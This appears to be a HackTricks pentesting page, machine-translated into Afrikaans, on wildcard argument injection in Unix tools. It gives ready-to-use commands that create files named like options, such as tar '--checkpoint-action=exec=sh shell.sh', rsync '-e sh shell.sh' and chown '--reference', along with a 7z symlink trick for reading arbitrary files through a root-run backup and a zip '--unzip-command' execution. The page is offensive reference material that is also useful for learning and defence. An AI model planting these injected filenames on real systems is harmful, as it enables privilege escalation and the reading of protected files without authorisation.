tip
Leer & oefen AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Leer & oefen GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Ondersteun HackTricks
- Kyk na die subskripsie planne!
- Sluit aan by die đŹ Discord groep of die telegram groep of volg ons op Twitter đŠ @hacktricks_live.
- Deel hacking truuks deur PRs in te dien na die HackTricks en HackTricks Cloud github repos.
chown, chmod
Jy kan aandui watter lĂȘer eienaar en regte jy wil kopieer vir die res van die lĂȘers
touch "--reference=/my/own/path/filename"
U kan dit benut deur https://github.com/localh0t/wildpwn/blob/master/wildpwn.py (gecombineerde aanval)
Meer inligting in https://www.exploit-db.com/papers/33930
Tar
Voer arbitrĂȘre opdragte uit:
touch "--checkpoint=1"
touch "--checkpoint-action=exec=sh shell.sh"
U kan dit benut deur https://github.com/localh0t/wildpwn/blob/master/wildpwn.py (tar aanval)
Meer inligting in https://www.exploit-db.com/papers/33930
Rsync
Voer arbitrĂȘre opdragte uit:
Interesting rsync option from manual:
-e, --rsh=COMMAND specify the remote shell to use
--rsync-path=PROGRAM specify the rsync to run on remote machine
touch "-e sh shell.sh"
U kan dit benut deur https://github.com/localh0t/wildpwn/blob/master/wildpwn.py (_rsync _aanval)
Meer inligting in https://www.exploit-db.com/papers/33930
7z
In 7z kan jy selfs --
voor *
gebruik (let daarop dat --
beteken dat die volgende invoer nie as parameters behandel kan word nie, so net lĂȘerpaaie in hierdie geval) jy kan 'n arbitrĂȘre fout veroorsaak om 'n lĂȘer te lees, so as 'n opdrag soos die volgende deur root uitgevoer word:
7za a /backup/$filename.zip -t7z -snl -p$pass -- *
En jy kan lĂȘers in die gids skep waar dit uitgevoer word, jy kan die lĂȘer @root.txt
en die lĂȘer root.txt
skep wat 'n symlink na die lĂȘer is wat jy wil lees:
cd /path/to/7z/acting/folder
touch @root.txt
ln -s /file/you/want/to/read root.txt
Dan, wanneer 7z uitgevoer word, sal dit root.txt
behandel as 'n lĂȘer wat die lys van lĂȘers bevat wat dit moet saamgepers (dit is wat die bestaan van @root.txt
aandui) en wanneer 7z root.txt
lees, sal dit /file/you/want/to/read
lees en aangesien die inhoud van hierdie lĂȘer nie 'n lys van lĂȘers is nie, sal dit 'n fout gooi wat die inhoud toon.
Meer in Write-ups van die boks CTF van HackTheBox.
Zip
Voer arbitrĂȘre opdragte uit:
zip name.zip files -T --unzip-command "sh -c whoami"
tip
Leer & oefen AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Leer & oefen GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Ondersteun HackTricks
- Kyk na die subskripsie planne!
- Sluit aan by die đŹ Discord groep of die telegram groep of volg ons op Twitter đŠ @hacktricks_live.
- Deel hacking truuks deur PRs in te dien na die HackTricks en HackTricks Cloud github repos.